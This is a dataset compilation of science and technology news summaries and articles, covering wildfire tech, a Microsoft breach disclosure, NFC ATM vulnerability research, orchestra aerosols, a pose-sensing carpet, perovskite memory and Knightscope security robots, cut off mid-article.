A host of Silicon Valley-based technology developers is working with firefighters to enhance their firefighting capabilities. Technology industry investor Steve Blank envisions satellites detecting blazes as soon as they break out, with firefighting drones dispatched by artificial intelligence (AI). The California Department of Forestry and Fire Protection (Cal Fire) and other agencies have started using AI, satellites, and drones, and are considering additional measures. Phillip SeLegue at Cal Fire's Intelligence unit cited the adoption of the Technosylva data-processing platform, which predicts and monitors fires and their spread via a combination of real-time satellite and camera imagery. SeLegue also said this year should see the full deployment of aircraft imagery-processing AI software that transmits fire-location data to ground commanders. Startup Lumineye began with a goal of giving soldiers power to see through walls. But climate change has broadened the market, and Lumineye is now working with firefighters to tweak its product - a hand-held device that uses radar to see people inside buildings and in thick brush. "Unfortunately, the more often fires are occurring, the more we'll be focused on that use case," said Megan Lacy, co-founder and co-CEO of the company birthed from a class that grew out of a Stanford University entrepreneurship initiative. California's drought, plus forests full of fuels and communities along narrow roads in heavily treed areas make for a lethal recipe, tragically exemplified by the 2018 Camp Fire that killed 86 people in Paradise. With scientists agreeing that climate change will make wildfires increasingly catastrophic, the specter of flames devouring communities and smothering the state in smoke is driving innovation, much of it in Silicon Valley, to fight fires with new technology. Last year, a wall of fire swept down from the Santa Cruz Mountains toward tech-industry guru Steve Blank's palatial home overlooking the ocean south of Pescadero. His house remains standing thanks to what he calls the heroism of Cal Fire's ground forces, who helped him fight the flames to within a foot of his home. But if California does not aggressively implement new technologies, Blank believes, much of the Bay Area and the rest of California will be left in smoky ruins. "You're looking for force multipliers," said Blank, who invests in Rain , a Palo Alto startup making retardant-dropping drones. "How do we fight this exponential growth (in wildfires) without exceeding the gross domestic product of California?" Blank imagines a future where satellites detect fires as soon as they start and artificial intelligence software dispatches firefighting drones. That Blank would propose a Silicon Valley solution featuring AI and flying robots is perhaps unsurprising. He's an influential startup expert who teaches at UC Berkeley and Stanford University - his "Hacking for Defense" class at Stanford grew into a national program that produced Lumineye. And Blank's vision appears to be getting closer to reality every day. Cal Fire and other agencies have begun using AI, satellites and drones, and are examining other cutting-edge solutions. San Bernardino County Fire Chief Dan Munsey noted that not long ago, fire chiefs relied mostly on paper maps and ink markers. "The technology adoption we've seen over the last three years has exploded," Munsey said. During the Santa Cruz Mountains fire last year, one in a series of huge blazes sparked by dry lightning, Bay Area startup Zonehaven's map-based evacuation software for official and citizen use went live in what CEO Charlie Crocker described as "our trial by fire." Zonehaven was founded in 2018, and already, Cal Fire and dozens of other agencies and local governments - including Santa Clara, San Mateo, Contra Costa and Alameda counties - are adopting it to coordinate the safe exodus of people from threatened areas. The public app shows residents where they are on a map, with evacuation status - from advisory to warning to order - shown by the coloring of their zone. "If you were to really boil down what is the real issue in what I call the era of the mega-fires, it's evacuations," said Cal Fire's Santa Clara County unit Chief Jake Hess. Last year's fires torched a record 4.3 million acres in California, and this year, 85% of California is in extreme drought. Seven major wildfires were already burning last week across the state. At Rain, which is trying to sell service contracts for its drones to Cal Fire and other agencies, CEO Maxwell Brodie believes that while traditional firefighting methods are crucial they are insufficient in the face of more and bigger fires. "It doesn't matter how many people or aircraft or tankers you throw at the problem, our solutions do not scale," he said. "A significant challenge integrating new technology into fire operations is overcoming the ways things have always been." In the Menlo Park Fire District, Chief Harold Schapelhouman oversees a fleet of 30 camera-bearing drones he says could provide valuable eyes in the sky during wildfires, including at night and in smoke and weather conditions that ground choppers and planes. Cal Fire's use of drones for landscape and damage surveys is a good step, he believes, but the agency's safety rules don't allow him to launch his drones during wildfires, even flying low enough to not threaten firefighting aircraft. "Take the handcuffs off," he said. "Let us fly." Capella Space , a San Francisco company that has four satellites in orbit that can provide detailed landscape photos day or night, through clouds or smoke, plans to pitch its services to Cal Fire and the U.S. Forest Service so the agencies could "provide rapid information to the people on the ground to ensure that when they go into an area they know what to expect," said Dan Getman, vice-president of product. Stanford University materials science professor Eric Appel, who led development of a fire-stopping gel for roadsides, said caution about new firefighting technology is warranted "because people have also been trying to sell snake oil in this field for a long time." While Cal Fire's emergency funding in 2020-21 skyrocketed from an initial $360 million to more than $1 billion by the end of 2020 - paying for more firefighters and aircraft - money for new technologies is comparatively scarce, said Appel. Phillip SeLegue, deputy chief of Cal Fire's Intel unit, said the agency is responding to technological change along with environmental change and pointed to its adoption of data-processing platform Technosylva, which forecasts, monitors, and predicts fires and their spread. His colleague Hess described the software as "a technological shot in the arm." Cal Fire has also received real-time imagery from U.S. military drones, and invested heavily in a widespread system of forest cameras, Hess noted. The agency gets other feeds from classified Pentagon sources and from satellites that detect ignitions and allow ongoing fire assessment in nearly real-time, all visible on the Technosylva platform along with the ALERT camera views, SeLegue said. Related Articles $68 million price tag to fight CZU Lightning Complex fire Wildfire destroys historic buildings at Big Basin State Park, some redwoods have fallen Panic in Paradise: Nearby Bear Fire triggers locals who lost everything in Camp Fire to evacuate again Artificial intelligence software that processes imagery from Cal Fire aircraft and sends it to ground commanders to show fire locations should be in full use this year, SeLegue added. The agency plans to align with the U.S. Forest Service in using drones to ignite controlled burns to block fire spread, and is working with NASA on integrating autonomous drones into firefighting, potentially to carry people and supplies, provide communication links, or even drop retardant, he said. Whether technology can save us amid California's warming climate remains to be seen. Many communities in the Oakland and Berkeley hills, or in Woodside, Los Gatos, Felton and Bonny Doon, are nestled in forests and have limited escape routes. "It's really just a dice game," Stanford's Appel said. "The more big catastrophic fires we have, the greater chance that we have another Paradise."
190
Microsoft Discloses New Customer Hack Linked to SolarWinds Cyberattackers
Microsoft has issued a warning that hackers affiliated with Russia's Foreign Intelligence Service had installed data-harvesting malware on one of its systems and used the information to attack some of its customers. The company identified the attackers as Nobelium, the same group linked to the breach at Texas-based software supplier SolarWinds. A Microsoft spokesman said in compromising a computer used by a Microsoft customer support employee, the attackers could have accessed metadata of the company's accounts and billing contact information. The software giant said it knows of three customers affected by the breach, and has eliminated the access point and secured the device.
[]
[]
[]
scitechnews
None
None
None
None
Microsoft has issued a warning that hackers affiliated with Russia's Foreign Intelligence Service had installed data-harvesting malware on one of its systems and used the information to attack some of its customers. The company identified the attackers as Nobelium, the same group linked to the breach at Texas-based software supplier SolarWinds. A Microsoft spokesman said in compromising a computer used by a Microsoft customer support employee, the attackers could have accessed metadata of the company's accounts and billing contact information. The software giant said it knows of three customers affected by the breach, and has eliminated the access point and secured the device.
191
Banning Extreme Views on YouTube Really Does Help Stop Their Spread
The results of a study indicated that banning people who espouse extreme views from the YouTube online video platform shrinks their audience. National Taiwan University's Adrian Rauchfleisch and Harvard University's Jonas Kaiser reviewed more than 11,000 YouTube channels of all political varieties between January 2018 and October 2019, tracking the number of videos each account posted, how many views they received, and whether they stayed on YouTube during the study period. Approximately one in 20 channels was deleted or banned, while 25% were removed for copyright infringement, with far-right-leaning channels more likely to be barred for breaching hate speech regulations. The average YouTube-posted video got 19.5 times more views than the average on extremist video-hosting platform BitChute, although this differed by channel. Said Rebekah Tromble at George Washington University, "We still have a lot to learn about the larger video-sharing ecosystem."
[]
[]
[]
scitechnews
None
None
None
None
The results of a study indicated that banning people who espouse extreme views from the YouTube online video platform shrinks their audience. National Taiwan University's Adrian Rauchfleisch and Harvard University's Jonas Kaiser reviewed more than 11,000 YouTube channels of all political varieties between January 2018 and October 2019, tracking the number of videos each account posted, how many views they received, and whether they stayed on YouTube during the study period. Approximately one in 20 channels was deleted or banned, while 25% were removed for copyright infringement, with far-right-leaning channels more likely to be barred for breaching hate speech regulations. The average YouTube-posted video got 19.5 times more views than the average on extremist video-hosting platform BitChute, although this differed by channel. Said Rebekah Tromble at George Washington University, "We still have a lot to learn about the larger video-sharing ecosystem."
192
NFC Flaws Let Researchers Hack ATMs by Waving a Phone
For years, security researchers and cybercriminals have hacked ATMs by using all possible avenues to their innards, from opening a front panel and sticking a thumb drive into a USB port to drilling a hole that exposes internal wiring . Now one researcher has found a collection of bugs that allow him to hack ATMs - along with a wide variety of point-of-sale terminals - in a new way: with a wave of his phone over a contactless credit card reader. Josep Rodriguez, a researcher and consultant at security firm IOActive, has spent the last year digging up and reporting vulnerabilities in the so-called near-field communications reader chips used in millions of ATMs and point-of-sale systems worldwide. NFC systems are what let you wave a credit card over a reader - rather than swipe or insert it - to make a payment or extract money from a cash machine. You can find them on countless retail store and restaurant counters, vending machines, taxis, and parking meters around the globe. Now Rodriguez has built an Android app that allows his smartphone to mimic those credit card radio communications and exploit flaws in the NFC systems' firmware. With a wave of his phone, he can exploit a variety of bugs to crash point-of-sale devices, hack them to collect and transmit credit card data, invisibly change the value of transactions, and even lock the devices while displaying a ransomware message. Rodriguez says he can even force at least one brand of ATMs to dispense cash - though that "jackpotting" hack only works in combination with additional bugs he says he's found in the ATMs' software. He declined to specify or disclose those flaws publicly due to nondisclosure agreements with the ATM vendors. "You can modify the firmware and change the price to one dollar, for instance, even when the screen shows that you're paying 50 dollars. You can make the device useless, or install a kind of ransomware. There are a lot of possibilities here," says Rodriguez of the point-of-sale attacks he discovered. "If you chain the attack and also send a special payload to an ATM's computer, you can jackpot the ATM - like cash out, just by tapping your phone." Rodriguez says he alerted the affected vendors - which include ID Tech, Ingenico, Verifone, Crane Payment Innovations, BBPOS, Nexgo, and the unnamed ATM vendor - to his findings between 7 months and a year ago. Even so, he warns that the sheer number of affected systems and the fact that many point-of-sale terminals and ATMs don't regularly receive software updates - and in many cases require physical access to update - mean that many of those devices likely remain vulnerable. "Patching so many hundreds of thousands of ATMs physically, it's something that would require a lot of time," Rodriguez says. As a demonstration of those lingering vulnerabilities, Rodriguez shared a video with WIRED in which he waves a smartphone over the NFC reader of an ATM on the street in Madrid, where he lives, and causes the machine to display an error message. The NFC reader appears to crash, and no longer reads his credit card when he next touches it to the machine. (Rodriguez asked that WIRED not publish the video for fear of legal liability. He also didn't provide a video demo of a jackpotting attack because, he says, he could only legally test it on machines obtained as part of IOActive's security consulting to the affected ATM vendor, with whom IOActive has signed an NDA.) The findings are "excellent research into the vulnerability of software running on embedded devices," says Karsten Nohl, the founder of security firm SRLabs and a well-known firmware hacker, who reviewed Rodriguez's work. But Nohl points to a few drawbacks that reduce its practicality for real-world thieves. A hacked NFC reader would only be able to steal mag-stripe credit card data, not the victim's PIN or the data from EMV chips . And the fact that the ATM cashout trick would require an extra, distinct vulnerability in a target ATM's code is no small caveat, Nohl says.
An Android app developed by IOActive's Josep Rodriguez exploits flaws in near-field communication (NFC) systems, enabling ATMs and a variety of point-of-sale terminals to be hacked by waving a smartphone over a contactless credit card reader. Rodriguez said his app was able to force at least one ATM brand to dispense cash, but only in combination with other flaws in the ATM's software. Rodriguez added that the point-of-sale vulnerabilities allow you to "modify the firmware and change the price to $1, for instance, even when the screen shows that you're paying $50. You can make the device useless, or install a kind of ransomware. There are a lot of possibilities here." The findings have been disclosed to the affected vendors, but Rodriguez acknowledged that physically patching hundreds of thousands of affected terminals and ATMs "would require a lot of time."
[]
[]
[]
scitechnews
None
None
None
None
An Android app developed by IOActive's Josep Rodriguez exploits flaws in near-field communication (NFC) systems, enabling ATMs and a variety of point-of-sale terminals to be hacked by waving a smartphone over a contactless credit card reader. Rodriguez said his app was able to force at least one ATM brand to dispense cash, but only in combination with other flaws in the ATM's software. Rodriguez added that the point-of-sale vulnerabilities allow you to "modify the firmware and change the price to $1, for instance, even when the screen shows that you're paying $50. You can make the device useless, or install a kind of ransomware. There are a lot of possibilities here." The findings have been disclosed to the affected vendors, but Rodriguez acknowledged that physically patching hundreds of thousands of affected terminals and ATMs "would require a lot of time." For years, security researchers and cybercriminals have hacked ATMs by using all possible avenues to their innards, from opening a front panel and sticking a thumb drive into a USB port to drilling a hole that exposes internal wiring . Now one researcher has found a collection of bugs that allow him to hack ATMs - along with a wide variety of point-of-sale terminals - in a new way: with a wave of his phone over a contactless credit card reader. Josep Rodriguez, a researcher and consultant at security firm IOActive, has spent the last year digging up and reporting vulnerabilities in the so-called near-field communications reader chips used in millions of ATMs and point-of-sale systems worldwide. NFC systems are what let you wave a credit card over a reader - rather than swipe or insert it - to make a payment or extract money from a cash machine. You can find them on countless retail store and restaurant counters, vending machines, taxis, and parking meters around the globe. Now Rodriguez has built an Android app that allows his smartphone to mimic those credit card radio communications and exploit flaws in the NFC systems' firmware. With a wave of his phone, he can exploit a variety of bugs to crash point-of-sale devices, hack them to collect and transmit credit card data, invisibly change the value of transactions, and even lock the devices while displaying a ransomware message. Rodriguez says he can even force at least one brand of ATMs to dispense cash - though that "jackpotting" hack only works in combination with additional bugs he says he's found in the ATMs' software. He declined to specify or disclose those flaws publicly due to nondisclosure agreements with the ATM vendors. "You can modify the firmware and change the price to one dollar, for instance, even when the screen shows that you're paying 50 dollars. You can make the device useless, or install a kind of ransomware. There are a lot of possibilities here," says Rodriguez of the point-of-sale attacks he discovered. "If you chain the attack and also send a special payload to an ATM's computer, you can jackpot the ATM - like cash out, just by tapping your phone." Rodriguez says he alerted the affected vendors - which include ID Tech, Ingenico, Verifone, Crane Payment Innovations, BBPOS, Nexgo, and the unnamed ATM vendor - to his findings between 7 months and a year ago. Even so, he warns that the sheer number of affected systems and the fact that many point-of-sale terminals and ATMs don't regularly receive software updates - and in many cases require physical access to update - mean that many of those devices likely remain vulnerable. "Patching so many hundreds of thousands of ATMs physically, it's something that would require a lot of time," Rodriguez says. As a demonstration of those lingering vulnerabilities, Rodriguez shared a video with WIRED in which he waves a smartphone over the NFC reader of an ATM on the street in Madrid, where he lives, and causes the machine to display an error message. The NFC reader appears to crash, and no longer reads his credit card when he next touches it to the machine. (Rodriguez asked that WIRED not publish the video for fear of legal liability. He also didn't provide a video demo of a jackpotting attack because, he says, he could only legally test it on machines obtained as part of IOActive's security consulting to the affected ATM vendor, with whom IOActive has signed an NDA.) The findings are "excellent research into the vulnerability of software running on embedded devices," says Karsten Nohl, the founder of security firm SRLabs and a well-known firmware hacker, who reviewed Rodriguez's work. But Nohl points to a few drawbacks that reduce its practicality for real-world thieves. A hacked NFC reader would only be able to steal mag-stripe credit card data, not the victim's PIN or the data from EMV chips . And the fact that the ATM cashout trick would require an extra, distinct vulnerability in a target ATM's code is no small caveat, Nohl says.
193
Musical Chairs? Swapping Seats Could Reduce Orchestra Aerosols.
If musical instruments were people, trumpets would be super spreaders. When a trumpeter blows into the mouthpiece, tiny respiratory droplets, known as aerosols, travel out of the musician's mouth, whiz through the brass tubing and spray into the air. During a deadly pandemic, when a musician might unwittingly be exhaling an infectious virus, that poses a potential problem for orchestras. And the trumpet is not the only musical health hazard. "Wind instruments are like machines to aerosolize respiratory droplets," said Tony Saad, a chemical engineer and expert in computational fluid dynamics at the University of Utah. A simple but radical change - rearranging the musicians - could significantly reduce the aerosol buildup on stage, Dr. Saad and his colleagues reported in a new study , which was published in Science Advances on Wednesday.
Researchers at the University of Utah and the University of Minnesota (UMN) used a computer model to analyze aerosol accumulations in a concert hall to determine whether rearranging musicians could significantly reduce aerosol buildup on stage. The model mapped every air vent and the rate of airflow through the space's heating, ventilation, and air conditioning system, as well as the typical position of each member of the Utah Symphony. To simulate the spread of aerosols during a concert, the team incorporated UMN research that quantified the concentration and size of aerosol particles emitted by various wind instruments. By applying computational fluid dynamics simulations to model the flow of air and aerosols through the hall when all musicians were playing, the researchers determined that orchestras can reduce the risk of aerosol spread by placing the highest-risk instruments near open doors and air return vents.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the University of Utah and the University of Minnesota (UMN) used a computer model to analyze aerosol accumulations in a concert hall to determine whether rearranging musicians could significantly reduce aerosol buildup on stage. The model mapped every air vent and the rate of airflow through the space's heating, ventilation, and air conditioning system, as well as the typical position of each member of the Utah Symphony. To simulate the spread of aerosols during a concert, the team incorporated UMN research that quantified the concentration and size of aerosol particles emitted by various wind instruments. By applying computational fluid dynamics simulations to model the flow of air and aerosols through the hall when all musicians were playing, the researchers determined that orchestras can reduce the risk of aerosol spread by placing the highest-risk instruments near open doors and air return vents. If musical instruments were people, trumpets would be super spreaders. When a trumpeter blows into the mouthpiece, tiny respiratory droplets, known as aerosols, travel out of the musician's mouth, whiz through the brass tubing and spray into the air. During a deadly pandemic, when a musician might unwittingly be exhaling an infectious virus, that poses a potential problem for orchestras. And the trumpet is not the only musical health hazard. "Wind instruments are like machines to aerosolize respiratory droplets," said Tony Saad, a chemical engineer and expert in computational fluid dynamics at the University of Utah. A simple but radical change - rearranging the musicians - could significantly reduce the aerosol buildup on stage, Dr. Saad and his colleagues reported in a new study , which was published in Science Advances on Wednesday.
194
Intelligent Carpet Gives Insight into Human Poses
The sentient Magic Carpet from Aladdin might have a new competitor. While it can't fly or speak, a new tactile sensing carpet from MIT's Computer Science and Artificial Intelligence Laboratory (CSAIL) can estimate human poses without using cameras, in a step towards improving self-powered personalized healthcare, smart homes, and gaming. Many of our daily activities involve physical contact with the ground: walking, exercising, or resting. These embedded interactions contain a wealth of information that help us better understand people's movements. Previous research has leveraged use of single RGB cameras , (think Microsoft Kinect), wearable omnidirectional cameras , and even plain old off the shelf webcams, but with the inevitable byproducts of camera occlusions and privacy concerns. The CSAIL team's system only used cameras to create the dataset the system was trained on, and only captured the moment of the person performing the activity. To infer the 3-D pose, a person would simply have to get on the carpet, perform an action, and then the team's deep neural network, using just the tactile information, could determine if the person was doing sit-ups, stretching, or doing another action. "You can imagine leveraging this model to enable a seamless health monitoring system for high-risk individuals, for fall detection, rehab monitoring, mobility, and more," says Yiyue Luo, a lead author on a paper about the carpet. The carpet itself, which is low cost and scalable, was made of commercial, pressure-sensitive film and conductive thread, with over nine thousand sensors spanning thirty six by two feet. (Most living room rug sizes are eight by ten or nine by twelve.) Each of the sensors on the carpet convert the human's pressure into an electrical signal, through the physical contact between people's feet, limbs, torso, and the carpet. The system was specifically trained on synchronized tactile and visual data, such as a video and corresponding heatmap of someone doing a pushup. The model takes the pose extracted from the visual data as the ground truth, uses the tactile data as input, and finally outputs the 3-D human pose. This might look something like, when, after stepping onto the carpet, and doing a set up of pushups, the system is able to produce an image or video of someone doing a push-up. In fact, the model was able to predict a person's pose with an error margin (measured by the distance between predicted human body key points and ground truth key points) by less than ten centimeters. For classifying specific actions, the system was accurate 97 percent of the time. "You may envision using the carpet for workout purposes. Based solely on tactile information, it can recognize the activity, count the number of reps, and calculate the amount of burned calories." says Yunzhu Li, a co-author on the paper. Since much of the pressure distributions were prompted by movement of the lower body and torso, that information was more accurate than the upper body data. Also, the model was unable to predict poses without more explicit floor contact, like free-floating legs during sit-ups, or a twisted torso while standing up. While the system can understand a single person, the scientists, down the line, want to improve the metrics for multiple users, where two people might be dancing or hugging on the carpet. They also hope to gain more information from the tactical signals, such as a person's height or weight. Luo wrote the paper alongside MIT CSAIL PhD students Yunzhu Li and Pratyusha Sharma, MIT CSAIL mechanical engineer Michael Foshey, MIT CSAIL postdoc Wan Shou, and MIT professors Tomas Palacios, Antonio Torralba, and Wojciech Matusik. The work is funded by the Toyota Research Institute.
A new tactile sensing carpet assembled from pressure-sensitive film and conductive thread is able to calculate human poses without cameras. Built by engineers at the Massachusetts Institute of Technology (MIT) 's Computer Science and Artificial Intelligence Laboratory, the system's neural network was trained on a dataset of camera-recorded poses; when a person performs an action on the carpet, it can infer the three-dimensional pose from tactile data. More than 9,000 sensors are woven into the carpet, and convert the pressure of a person's feet on the carpet into an electrical signal. The computational model could predict a pose with a less-than-10-centimeter error margin, and classify specific actions with 97% accuracy. MIT's Yiyue Luo said, "You can imagine leveraging this model to enable a seamless health monitoring system for high-risk individuals, for fall detection, rehab monitoring, mobility, and more."
[]
[]
[]
scitechnews
None
None
None
None
A new tactile sensing carpet assembled from pressure-sensitive film and conductive thread is able to calculate human poses without cameras. Built by engineers at the Massachusetts Institute of Technology (MIT) 's Computer Science and Artificial Intelligence Laboratory, the system's neural network was trained on a dataset of camera-recorded poses; when a person performs an action on the carpet, it can infer the three-dimensional pose from tactile data. More than 9,000 sensors are woven into the carpet, and convert the pressure of a person's feet on the carpet into an electrical signal. The computational model could predict a pose with a less-than-10-centimeter error margin, and classify specific actions with 97% accuracy. MIT's Yiyue Luo said, "You can imagine leveraging this model to enable a seamless health monitoring system for high-risk individuals, for fall detection, rehab monitoring, mobility, and more." The sentient Magic Carpet from Aladdin might have a new competitor. While it can't fly or speak, a new tactile sensing carpet from MIT's Computer Science and Artificial Intelligence Laboratory (CSAIL) can estimate human poses without using cameras, in a step towards improving self-powered personalized healthcare, smart homes, and gaming. Many of our daily activities involve physical contact with the ground: walking, exercising, or resting. These embedded interactions contain a wealth of information that help us better understand people's movements. Previous research has leveraged use of single RGB cameras , (think Microsoft Kinect), wearable omnidirectional cameras , and even plain old off the shelf webcams, but with the inevitable byproducts of camera occlusions and privacy concerns. The CSAIL team's system only used cameras to create the dataset the system was trained on, and only captured the moment of the person performing the activity. To infer the 3-D pose, a person would simply have to get on the carpet, perform an action, and then the team's deep neural network, using just the tactile information, could determine if the person was doing sit-ups, stretching, or doing another action. "You can imagine leveraging this model to enable a seamless health monitoring system for high-risk individuals, for fall detection, rehab monitoring, mobility, and more," says Yiyue Luo, a lead author on a paper about the carpet. The carpet itself, which is low cost and scalable, was made of commercial, pressure-sensitive film and conductive thread, with over nine thousand sensors spanning thirty six by two feet. (Most living room rug sizes are eight by ten or nine by twelve.) Each of the sensors on the carpet convert the human's pressure into an electrical signal, through the physical contact between people's feet, limbs, torso, and the carpet. The system was specifically trained on synchronized tactile and visual data, such as a video and corresponding heatmap of someone doing a pushup. The model takes the pose extracted from the visual data as the ground truth, uses the tactile data as input, and finally outputs the 3-D human pose. This might look something like, when, after stepping onto the carpet, and doing a set up of pushups, the system is able to produce an image or video of someone doing a push-up. In fact, the model was able to predict a person's pose with an error margin (measured by the distance between predicted human body key points and ground truth key points) by less than ten centimeters. For classifying specific actions, the system was accurate 97 percent of the time. "You may envision using the carpet for workout purposes. Based solely on tactile information, it can recognize the activity, count the number of reps, and calculate the amount of burned calories." says Yunzhu Li, a co-author on the paper. Since much of the pressure distributions were prompted by movement of the lower body and torso, that information was more accurate than the upper body data. Also, the model was unable to predict poses without more explicit floor contact, like free-floating legs during sit-ups, or a twisted torso while standing up. While the system can understand a single person, the scientists, down the line, want to improve the metrics for multiple users, where two people might be dancing or hugging on the carpet. They also hope to gain more information from the tactical signals, such as a person's height or weight. Luo wrote the paper alongside MIT CSAIL PhD students Yunzhu Li and Pratyusha Sharma, MIT CSAIL mechanical engineer Michael Foshey, MIT CSAIL postdoc Wan Shou, and MIT professors Tomas Palacios, Antonio Torralba, and Wojciech Matusik. The work is funded by the Toyota Research Institute.
195
Perovskite Memory Devices with Ultra-Fast Switching Speed
A halide perovskite-based memory that can overcome slow switching speeds has been developed by researchers at South Korea's Pohang University of Science and Technology (POSTECH). The team selected the compound Cs3Sb2I9 from 696 candidate halide perovskite compounds and used it to fabricate memory devices, which they ran at a switching speed of 20 nanoseconds, a roughly 100-fold speedup from memory devices using layer-structured Cs3Sb2I9. POSTECH's Jang-Sik Lee said, "This study provides an important step toward the development of resistive switching memory that can be operated at an ultra-fast switching speed. This work offers an opportunity to design new materials for memory devices based on calculations and experimental verification."
[]
[]
[]
scitechnews
None
None
None
None
A halide perovskite-based memory that can overcome slow switching speeds has been developed by researchers at South Korea's Pohang University of Science and Technology (POSTECH). The team selected the compound Cs3Sb2I9 from 696 candidate halide perovskite compounds and used it to fabricate memory devices, which they ran at a switching speed of 20 nanoseconds, a roughly 100-fold speedup from memory devices using layer-structured Cs3Sb2I9. POSTECH's Jang-Sik Lee said, "This study provides an important step toward the development of resistive switching memory that can be operated at an ultra-fast switching speed. This work offers an opportunity to design new materials for memory devices based on calculations and experimental verification."
196
Security Robots Expand Across U.S., with Few Tangible Results
When the Westland Real Estate Group bought Liberty Village, a sprawling 1,000-unit apartment complex on the northeastern edge of Las Vegas nearly two years ago, the police department identified it as one of the city's most frequent sources of 911 calls. "There was a little bit of everything," said Dena Lerner, a spokeswoman for Westland. "A lot of gang activity that revolved around controlled substances, prostitution, dog rings. We had issues with gun rings, drive-by shootings, robberies, assaults - we're talking everything." So earlier this year, Westland introduced a broader program to reduce crime and added an "autonomous security robot" manufactured by Knightscope, a Silicon Valley company to make the complex safer. Each robot is given a nickname, and the one roaming around Liberty Village is called "Westy." This model, K5, is a conical, bulky, artificial intelligence-powered robot that stands just over 5 feet tall. Westy slowly roams around at about a human walking speed, with four internal cameras capturing a constant 360-degree view. It also can scan and record license plates and unique digital identifiers that every cellphone broadcasts, known as MAC addresses. But it's unclear how much Westy has reduced crime at Liberty Village. Knightscope, which is eagerly trying to recruit new clients, told local news outlets that Westy had resulted in a "significant drop in 911 calls," underscoring "yet another crime-fighting win." Knightscope included articles about Westy as part of its recent pitch to individual investors and in its plans to take the company public . Officer Aden Ocampo-Gomez, a spokesman for the Las Vegas Metropolitan Police Department, said that while the complex is no longer in the agency's top 10 list for most frequent 911 calls in the northeastern part of the Las Vegas Valley, he doesn't think all the credit should go to Westy. "I cannot say it was due to the robot," he said. As more government agencies and private sector companies resort to robots to help fight crime, the verdict is out about how effective they are in actually reducing it. Knightscope, which experts say is the dominant player in this market, has cited little public evidence that its robots have reduced crime as the company deploys them everywhere from a Georgia shopping mall to an Arizona development to a Nevada casino . Knightscope's clients also don't know how much these security robots help. "Are we seeing dramatic changes since we deployed the robot in January?" Lerner, the Westland spokesperson said. "No. But I do believe it is a great tool to keep a community as large as this, to keep it safer, to keep it controlled." For its part, Knightscope maintains on its website that the robots "predict and prevent crime," without much evidence that they do so. Experts say this is a bold claim. "It would be difficult to introduce a single thing and it causes crime to go down," said Ryan Calo , a law professor at the University of Washington, comparing the Knightscope robots to a "roving scarecrow." Additionally, the company does not provide specific, detailed examples of crimes that have been thwarted due to the robots. "I definitely say that we are making a difference," said Stacy Stephens, Knightscope's co-founder and executive vice president. "You don't know what might have happened compared to deploying a security guard out there." The company's CEO, William Li, founded Knightscope after trying to come up with a response to the December 2012 mass shooting at Sandy Hook Elementary School in Connecticut that left 20 young children dead. "That infuriated me," Li, a former Ford executive, told USA Today in January 2014. The company came up with a robot that would "predict and prevent crime in your community," according to an archived version of its website. "There are 7 billion people on the planet, and we'll soon have a few billion more, and law enforcement is not going to scale at the same rate; we literally can't afford it," Li said. Since then Knightscope robots have become the crime-fighting friend of corporate clients in various cities nationwide, including Honolulu, Washington, D.C. and a community college in Tucson, Arizona . Typically, a casino, residential facility, bank or, in one case, a police department, rents a robot for an average fee of around $70,000 to $80,000 per year. Part of that cost involves Knightscope storing all of the data that robots like Westy gather in a year. This huge volume of data is the equivalent of more than the combined storage of 175 iPhones, each with the maximum storage capacity of 512 gigabytes. According to Knightscope's most recent annual report , the company has a current fleet of 52 machines used across 23 clients, with a backlog of 27 more robots to deliver. Each robot has an expected life span of "three to four and a half years." But the finances behind the police robot business is a difficult one. Last year, Knightscope lost more money than ever, with a $19.3 million net loss, nearly double from 2019. While some clients are buying more robots, the company's overall number of clients fell to 23, from 30, in the past four years. Plus, the number of robots leased has plateaued at 52 from the end of 2018 through the end of last year. The pandemic certainly didn't help things. Just two months ago, Knightscope told investors that there was "substantial doubt regarding our ability to continue " given the company's "accumulated deficit," or debt, of over $69 million as of the end of 2020. Its operating expenses jumped by more than 50 percent, including a small increase on research, and a doubling of the company's marketing budget. Knightscope itself recently told investors that absent additional fundraising efforts, it will "not be solvent after the third quarter of 2022." Stephens, Knightscope's co-founder, said that the company's client retention rate is 85 percent, and that the company has clients that have renewed for four years. "I can't comment on future rounds of funding. But we have been through seven rounds of funding to date," he said. "We've been able to advance the technology each time, and we have been able to grow the revenue side each time as well." Knightscope's best-known deployment is in Huntington Park, California, a small city south of downtown Los Angeles. The Huntington Park Police Department was the first law enforcement agency to partner directly with Knightscope. For two years, a single Knightscope robot, dubbed " HP RoboCop ," has roamed part of the city's Salt Lake Park. The robot captures constant video of park activity, and has the ability to broadcast back to police live, although the Huntington Park Police Department does not use this feature often. As recently as May 2020, the Huntington Park Police Department presented statistics to the City Council comparing a five-month period, from June to December, in 2018 and in 2019. The data shows that "crime or incident reports" went down, from 48 to 26, and arrests went up, from 11 to 14. "The K-5 robot is having a positive impact on crime and nuisance activity at Salt Lake Park, which is reducing the instances of police activity at the park," both the city manager, Ricardo Reyes, and the chief of police, Cosme Lozano, wrote to local lawmakers last year. In a recent interview, Lozano called the robot's presence a "positive result" and sees "no downside" in having it. But the department does not even use all of the robot's abilities, according to Lozano. The police can't monitor the robot's live video on a constant basis because that would "burn through" the 100 gigabytes of data that the agency has allotted to it per month, similar to a data cap on a monthly cellphone plan. Lozano added that the Huntington Park Police Department also does not use the license plate reader, thermal scanning or mobile phone scanning features, as they have not been adequately evaluated by the police department yet. When asked to cite examples of arrests that were made because of the robot over the two years since it was deployed, Lozano said there haven't been many. "I want to say that it's been useful in robot tipping and vandalism against the robot itself," he said, noting that this has only occurred twice in two years. Nevertheless, Lozano said he will recommend that the city renew the contract again when it comes before the City Council, which is expected in coming weeks. As Knightscope has expanded, it has been involved in both tragic and comical episodes. In 2016, a K5 roaming around Stanford Shopping Center in Palo Alto, California, hit a 16-month-old toddler, bruising his leg and running over his foot. The company apologized , calling it a "freakish accident," and invited the family to visit the company's nearby headquarters in Mountain View, which the family declined . The following year, another K5 robot slipped on steps adjacent to a fountain at the Washington Harbour development in Washington, D.C., falling into the water. In October 2019, a Huntington Park woman, Cogo Guebara, told NBC News that she tried reporting a fistfight by pressing an emergency alert button on the HP RoboCop itself, but to no avail. She learned later the emergency button was not yet connected to the police department itself. Knightscope once promoted several clients in California, including the NBA's Sacramento Kings the city of Hayward, and the Westfield Valley Fair Mall in Santa Clara,not far from the robot company's headquarters. But those clients say that they no longer have contracts with Knightscope. Hayward dispatched its robot in a city parking garage in 2018. The following year, a man attacked and knocked over the robot. Despite having clear video and photographic evidence of the alleged crime , no one was arrested, according to Adam Kostrzak, the city's chief information officer.However, last year, Hayward did not renew the annual contract with Knightscope "due to the financial impact of 